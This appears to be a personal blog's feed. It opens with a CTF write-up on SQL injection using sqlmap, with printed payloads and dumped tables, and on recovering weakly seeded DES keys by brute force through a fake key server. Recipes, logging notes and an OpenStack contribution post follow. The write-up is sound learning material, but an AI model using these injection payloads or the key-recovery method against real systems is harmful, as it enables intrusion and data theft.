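print(results[:5])  # [0, 2, 4, 6, 8]
```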

NEEEXT! Student Body: finding some scrap papers (objective 9)

  • Got some hints in the game talking about sqlmap. Let’s play with that and learn about SQL injections :)
    • Started by looking at the page and reading the source code. Identified two forms on two pages that looked interesting.
    • First went down a rabbit hole of the sqlmap tamper scripts.
    • Just doing this:
token=$(curl validation)
sqlmap --url="https://url?token=$token" -p variable
  • Got sqlmap to find that the elfmail parameter in check.php was vulnerable.
  • curl "https://url?'token=$token"
    • got a noice SQL error!
  • tamper investigation was not wasted because
token=$(curl validation)
sqlmap --url="$token" -p elfmail --eval="import requests;token=requests.get('').text"
  • was needed to get sqlmap to find some techniques. Presumably the token only worked for the first tests.
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ' AND 2977=2977 AND 'tYvj'='tYvj&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ' AND (SELECT 4602 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(4602=4602,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XazW'='XazW&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

Could not get the above queries to work in a curl.. maybe some escaping mess-up. But sqlmap --users finds stuff.

[18:51:19] [INFO] retrieved: 'elfu'
[18:51:20] [INFO] retrieved: 'applications'
[18:51:21] [INFO] retrieved: 'elfu'
[18:51:22] [INFO] retrieved: 'krampus'
[18:51:23] [INFO] retrieved: 'elfu'
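About that curl escaping mess-up: it is most likely just URL encoding, since the payload is full of quotes, spaces and equals signs that curl won't encode for you. A quick check with Python's urllib (the payload string is the one from the sqlmap output above):

```python
from urllib.parse import quote

payload = "' AND 2977=2977 AND 'tYvj'='tYvj"
encoded = quote(payload, safe="")
print(encoded)  # %27%20AND%202977%3D2977%20AND%20%27tYvj%27%3D%27tYvj
```

curl can do the same encoding itself with `-G --data-urlencode "elfmail=..."`.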

sqlmap had a nice --sql-shell, and with that one could "select * from elfu.krampus", which got us some paths:

select * from elfu.krampus [6]:
[*] /krampus/0f5f510e.png, 1
[*] /krampus/1cc7e121.png, 2
[*] /krampus/439f15e6.png, 3
[*] /krampus/667d6896.png, 4
[*] /krampus/adb798ca.png, 5
[*] /krampus/ba417715.png, 6

Now that looks like an OS path, so I'd need to run a shell command.. but on a whim I tried them as web paths and yay, found them there. Fired up good old GIMP and learnt about the rotate tool :P Yay, one more objective!

Remaining are reversing a crypto Windows executable, and banning the IPs in the firewall for the route API.

Crypto then. Hint is >

Running an encryption tells us it uses the unix epoch as a seed, and a hint to the challenge was "We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC." That is from 1575658800 to 1575666000. There are some super_secure_random and super_secure_srand functions, found with IDA Freeware. Probably they are not so super; for example is one in use. I wonder what the difference with --insecure is? One error talks about DES-CBC, which the internet says is insecure. It uses 56 bits and 8 bytes. The stack of do_encrypt also says "dd 8", so yay?


Which is used in security_init_cookie and imp__QueryPerformanceCounter. Way more than 8 bytes though.

While looking at these I listened to the youtube talk, and it said "running it at the same time generates the same key". Tried that with two identical files and it generated the same key. What about two files with different checksums? Yep. Same. Encryption key. So the next step would be to try to encrypt something for every second between 1575658800 and 1575666000? That's 7200 seconds, which would give us 7200-ish keys we could try to use to decrypt the file. Is it too much? Right now I'm thinking the --insecure flag might help if one uses Burp Suite to intercept the requests to the elfscrow API server? The time bit in the code uses time64.

call time into eax
then eax as a parameter into:
call super_secure_srand
There is a loop (8) and inside it the code calls super_secure_random, which looks complicated, but by googling the numbers in decimal we find:

which has

rseed * 214013 + 2531011
# the disassembly then does:
sar     eax, 10h
and     eax, 7FFFh

Which is also here:
And here I learnt that >> in python is the sar.
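Putting the multiply and those two instructions together, here is a one-step Python version of the LCG. The constants 214013 and 2531011 match MSVC's rand(), which is why googling them in decimal works:

```python
def msvc_rand_step(state):
    # rseed = rseed * 214013 + 2531011, truncated to 32 bits
    state = (state * 214013 + 2531011) & 0xFFFFFFFF
    # sar eax, 10h ; and eax, 7FFFh  ->  (state >> 16) & 0x7fff
    return state, (state >> 16) & 0x7FFF

state, value = msvc_rand_step(1)
print(value)  # 41, the well-known first MSVC rand() output after srand(1)
```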

After going for a walk I thought a bit about what the end goal here is. And it is not the key, but it could be. Right now the plan is to generate the secret-id, because the secret-id is what is used to decrypt with the tool, not the key. But maybe the uuid is something you only get from the escrow API server.

$ curl -XPOST -d 1234567890abcdef
$ curl -XPOST -d 0e5b05dd-e132-42aa-b699-1829d3e23e2f

Seems it is. And the hex needs to be in lowercase letters; ABCDEF did not fly. The UUID must be in this format: 00000000-0000-0000-0000-000000000000, it seems. Not sure about sqlmap use here. SSH and a web server are running, but SSH has been open on several previous addresses in this CTF too..

 WEBrick/1.4.2 (Ruby/2.6.3/2019-04-16) at
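As for the lowercase requirement, Python's uuid module can both validate the format and do the lowercasing (the id below is the one from the curl earlier):

```python
import uuid

raw = "0E5B05DD-E132-42AA-B699-1829D3E23E2F"
# uuid.UUID raises ValueError for anything not in the expected format,
# and str() always renders the canonical lowercase form
normalized = str(uuid.UUID(raw))
print(normalized)  # 0e5b05dd-e132-42aa-b699-1829d3e23e2f
```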

Actually, what might be doable with just the key is to set up my own API server that just returns the key.. Change the address in the binary, or finally use Burp, or a local DNS override? Still need to figure out the key :))

Let's try to read do_encrypt again:

  1. call read_file
  2. set some crypto vars
  3. call CryptAcquireContext
  4. call generate_key
    1. key goes into eax register I think
  5. call print_hex
  6. more crypto
  7. call CryptImport and CryptEncrypt
  8. call store_key and write_file
  9. call security_check_cookie

generate_key does:

  1. call time
  2. call super_secure_srand, probably with file,time and seed as args
  3. loop 8 times and call super_secure_random to modify state?
call    ?super_secure_random@@YAHXZ ; super_secure_random(void)
movzx   ecx, al
and     ecx, 0FFh
mov     edx, [ebp+buffer]
add     edx, [ebp+i]
mov     [edx], cl

super_secure_srand does:
something with the seed.. really unsure

super_secure_random does:
this is doing the rseed multiply, the sar and the and

The Key Writer


# key examples

# dcd5ed4c2acba87e
# 9f32148fe8ef55a8
# 0d2bac4df0a12e5a
# fa41fb5131993bf5

# like the >> much more than ^

def msvcrt_rand(seed):
    # 8 rounds of the MSVC LCG: rseed = rseed * 214013 + 2531011,
    # then (state >> 16) & 0x7fff, keeping only the low byte of that
    # (the movzx ecx, al / and ecx, 0FFh in the loop).
    state = seed
    keyarray = bytearray()
    for i in range(8):
        state = (state * 0x343FD + 0x269EC3) & 0xFFFFFFFF  # 214013 / 2531011 in hex
        keyarray.append((state >> 0x10) & 0x7FFF & 0xFF)   # >> is the sar, & the and
    return keyarray

seeds = range(1575658800, 1575666001)
# upper bound is +1 so we are not off by one ^
keys = [msvcrt_rand(rseed).hex() for rseed in seeds]

Trying the hosts file edit. As I use WSL I learnt that for .exe files I also need to update Windows' hosts file, even though I run them from inside WSL! Also the syntax is NOT:


Bunch of false positives for some reason… when I use the list of keys I generated, my localhost flask API and the hosts file override. Anyway, I let this run and used file to stop when it found a PDF. It stopped at 4849 (or the 4850th key in keys[] in my python; unsure if that is sorted), so the creation time might have been 1575663650 (Friday, December 6, 2019 8:20:50 PM):


# the Bruter

for i in $(seq 0 7200); do
  ./elfscrow.exe --decrypt --id=7debfae7-3a16-41e7-b211-678f5ebdce00 ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc out.pdf --insecure
  if [ -f out.pdf ]; then
    isitpdf=$(file out.pdf | grep -c PDF)
    if [ "$isitpdf" != 0 ]; then
      echo "GOT IT $i"
      exit 123
    fi
    # keep the false positives out of the way for the next round
    mv -v out.pdf "falses/$i.pdf"
  fi
done
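Instead of shelling out to file in a loop like that, one could also check the PDF magic bytes directly; a small sketch (the fake header in the demo is made up):

```python
import os
import tempfile

def looks_like_pdf(path):
    # `file` recognizes PDFs by the "%PDF-" magic at offset 0
    with open(path, "rb") as f:
        return f.read(5) == b"%PDF-"

# tiny demo with a fake PDF header
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"%PDF-1.4\n...")
print(looks_like_pdf(tmp.name))  # True
os.unlink(tmp.name)
```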

and the API server, a small flask app that hands out the next candidate key on every request:

from flask import Flask

# the keys generated by the key writer above (truncated here)
keys = ["b5ad6a321240fbec", "7200...", "7199", "..."]
api = Flask(__name__)

@api.route('/api/retrieve', methods=['POST'])
def get_key():
  # store the index of the last key tested in a file
  statefile = "/root/elfscrow_status"
  try:
    with open(statefile, "r") as r:
      icontent = int(r.read())
  except (IOError, ValueError):
    icontent = -1

  ncontent = icontent + 1
  print("Last was %s, updating to %s" % (icontent, ncontent))

  with open(statefile, "w+") as f:
    f.write(str(ncontent))

  # hand the next candidate key to elfscrow
  return str(keys[ncontent])

if __name__ == '__main__':
  api.run()

Then the answer was just a pdf2txt away: the five-word sentence at the beginning of the document!

OK, the Zeek/Bro logs are the last one?

The username was found in

Started on this earlier but stopped because I wasn't feeling it and it was a bit tedious.
Plan: make the queries programmatically. Also, this time, check the sizes of the requests; maybe that's important. The times when the attacks happen could be useful too?
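A sketch of what "programmatically" could look like, assuming the http.log is in JSON-lines form. The field names id.orig_h, uri and user_agent are real Zeek ones, but the sample records and the two indicator checks are just toy examples:

```python
import json
from collections import Counter

# hypothetical sample records standing in for a real http.log
sample_log = '\n'.join([
    '{"id.orig_h": "1.2.3.4", "uri": "/index.html", "user_agent": "Mozilla"}',
    '{"id.orig_h": "5.6.7.8", "uri": "/?file=../../etc/passwd", "user_agent": "curl"}',
    '{"id.orig_h": "9.9.9.9", "uri": "/", "user_agent": "() { :; }; ping evil"}',
])

bad = Counter()
for line in sample_log.splitlines():
    rec = json.loads(line)
    if "../" in rec.get("uri", ""):                       # LFI-ish path traversal
        bad[rec["id.orig_h"]] += 1
    if rec.get("user_agent", "").startswith("() {"):      # shellshock-ish user agent
        bad[rec["id.orig_h"]] += 1

print(sorted(bad))  # ['5.6.7.8', '9.9.9.9']
```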

Let's try out RITA as indicated in a hint; also found Malcolm while looking up this tool.. could be fun. But at least RITA couldn't import the http.log :/

Weird that the IPs with the LFI, shellshock etc. haven't POSTed.. maybe they posted later?

Wow you made it all this way? Prepare for a bit of downer! :)

In the end I ran out of time. The end of the year approached, and some busy times in January 2020! It turned out I had got quite far with a python script, but I think I had too many good IPs in my list. In the end I used a JQ solution found in a writeup that is available in the google cache, initially found by searching for the numbers used for the srand function in the elfscrow challenge.

Recipe: Tortellini Casserole

  • 2x tortellini, 250 g
  • 1x cherry tomatoes
  • 1x crushed tomatoes with herbs
  • 1x cooking cream, 10%
  • 1x feta cheese
  • salt and pepper

Mix the cream, crushed tomatoes and seasonings. Pour the mixture into an oven dish that already holds the tortellini and tomatoes. Feta cheese on top. Into the oven at 200 ℃ for ~18 min.

For version two: maybe better with ricotta, spinach and without the crushed tomatoes?

Recipe: Kids' Chicken & Salmon with Carrot and Sweet Potato

Take the frozen salmon out of the freezer.

  • 3 sweet potatoes
  • 1 parsnip
  • 3 carrots
  • 1 onion
  • 2 cloves of garlic

Put everything into two pots, each weighing about 800 g. The amount of water you need is 'enough that it covers the food'. Boil.

When it is done, put 400 g of salmon into one pot and 400 g of chicken into the other.

Recipe: Porridge


3 dl water and 3 dl milk. Whisk, and when steam rises turn the heat down. Add 4 scoops of 3/4 dl (12/4, i.e. 3 dl) of flakes (e.g. oat or four-grain). When it is almost done, take it off the heat and add salt.

Serve the porridge into bowls, put butter in the middle and sprinkle sugar on top.

Tadaa :)

Logging as a Service

Is there an open source thing out there I could use??

So if I want to use mostly free and open source software, there's a bunch of tools one needs to glue together:

These days, for primary ingestion, I'd like to have BGP ECMP/anycast for the rsyslog receivers. These would also run logstash (or a beat?). Or maybe one could have a load balancer up front which redirects traffic based on the incoming port (and maybe a syslog tag for some 'authentication'?) to a set of log-parsing/rsyslog servers.

These would write to a Kafka cluster.
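On the receiver side, shipping into Kafka could be as small as an omkafka action in rsyslog; a hedged sketch (the broker names and topic are made up):

```
# load rsyslog's Kafka output module and forward everything to a topic
module(load="omkafka")
action(type="omkafka"
       broker=["kafka1:9092", "kafka2:9092"]
       topic="syslog"
       template="RSYSLOG_SyslogProtocol23Format")
```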

Then we would need more readers to stream events on to Elastic, SIEMs, Hadoop, or other longer-term storage engines.

For the "as a Service" bit I'd like to play with Rundeck and have users configure most of the bits themselves. Logstash grokking/parsing needs outsourcing too, though. Fewer rules means more throughput, so it would be good to have different logstash processes for different logs. One could, like Loggly, direct users to ship logs with a tag to get them into the correct lane.

For reading, just Grafana and Kibana should be a good start.

Recipe: Chicken Caesar

Croutons: Oven on. Put the frozen bread in the microwave and warm it up. Cut it and put it on an oven tray. Mix with oil and garlic. Wait.

Mayonnaise: 1 dl rapeseed oil, one egg (do not break it) and a little mustard. Use an immersion blender (sauvasekoitin is the correct word). Put it in a small bowl and add garlic and salt.

Salad: small tomatoes, lettuce, one avocado, 400 g chicken fillet, just salted. Fry the chicken last, and when it is done put the croutons in the oven for a few minutes.

Serve with Parmigiano at the table.

Tadaa :)

Recipes: Avocado Pasta


Instructions: Chop one yellow onion. Put it in a pot with oil. Blend the Turkish yoghurt and two avocados. Salt generously, plus a little black pepper. Put the water on for the spaghetti.

Avocado mix onto the onions. Grate half a block of Parmigiano and put almost all of it in the pot. The surplus goes on the table.

Squeeze half a lemon into the pot. When it is warm it is ready. Finally, the spaghetti into the pot. Check whether more salt and pepper is needed.

Recipe: Chilli Feta Pasta



  • Block of feta cheese, 200 g
  • 180 g spaghetti
  • 1 chilli / habanero
  • ~350 g tomatoes
  • Olive oil
  • Salt and pepper

Instructions:

Turn the oven to 250 °C. Feta block into an oven dish, tomatoes around it. Chop the chilli and put it on top of the cheese. Plenty of oil over everything. Salt and pepper it :) 25 min in the oven.

When the water is at 100 °C, add salt and then the spaghetti.

When the tomatoes have burst, take the dish out of the oven and mix the feta and chilli. Put everything together.

Bon App!

Recipes: Overnight Oats with Blueberries


  • Quark (soft), 250 g
  • Milk, 100 g
  • Runny honey, 6-10 g
  • Frozen blueberries, 100 g
  • Oat flakes, 40 g
  • 1 box with a lid


Put the blueberries in the box and wait about an hour. Then put all the other ingredients in the box and mix. Watch that the blueberries do not get more crushed than you want. Close the box and put it in the fridge overnight.

Enjoy in the morning!

Contributing To OpenStack Upstream

Recently I had the pleasure of contributing upstream to the OpenStack project!

A link to my merged patches:

At a previous OpenStack Summit (these days called OpenInfra Summits), Vancouver 2018, I went a few days early and attended the Upstream Institute.
It was 1.5 days long or so, if I remember right. Looking up my notes from that, these were the highlights:

  • Best way to start getting involved is to attend weekly meetings of projects
  • Stickersssss
  • A very similar process to RDO with Gerrit and reviews
  • Underlying tests are all done with Ansible, and they have ARA enabled so one gets a nice web UI to view results afterward. Logs are saved as part of the Zuul testing too, so one can really dig in and see what is tested and what breaks when it's being tested.

Even though my patches came one baby and a bit over a year after the Upstream Institute, I could still figure things out quite quickly with the help of the guides and get bugs created and patches submitted. My general plan when first attending wasn't to contribute code changes, but rather to start reading code, perhaps find open bugs and so on.

The thing I wanted to change in puppet-keystone was apparently also possible to change in many other puppet-* modules, and less than a day after my puppet-keystone change got merged into master, someone else picked up the torch and made PRs to ~15 other repositories with similar changes :) Pretty cool!

Testing is hard! is one backport I created for puppet-keystone/rocky, and the Ubuntu testing was not working initially (it started with an APT mirror issue, and later it was slow and timed out)… After 20 rechecks and two weeks it still hadn't successfully passed a test. In the end we got there though, with the help of a core reviewer who actually updated some mirror and later disabled some tests :)

Now, the change itself was about oslo_middleware/max_request_body_size, so that we can increase it from the default 114688. The Pouta Cloud had issues where our Federation User Mappings were larger than 114688 bytes and we couldn't update them anymore; it turned out they were blocked by oslo_middleware.

(Does anybody know where 114688 bytes comes from? Some internal speculation has been that it is 128 kilobytes minus some headers.)
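For reference, raising the limit is a one-liner in keystone.conf; the doubled value below is just an example, not what we settled on:

```ini
[oslo_middleware]
max_request_body_size = 229376
```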

Anyway, the mapping we have now is simplified: just a long [ list ] of "local_username": "federation_email", domain: "default". I think the next step might be to try to figure out if we can make the rules using something like below instead of hardcoding the values into the rules

"name": "{0}" 

It's been quite hard to find examples that are exactly like our use case (and playing about with it is not a priority right now, just something in the backlog, but it could be interesting to look at when we start accepting more federations).

All in all, I’m really happy to have gotten to contribute something to the OpenStack ecosystem!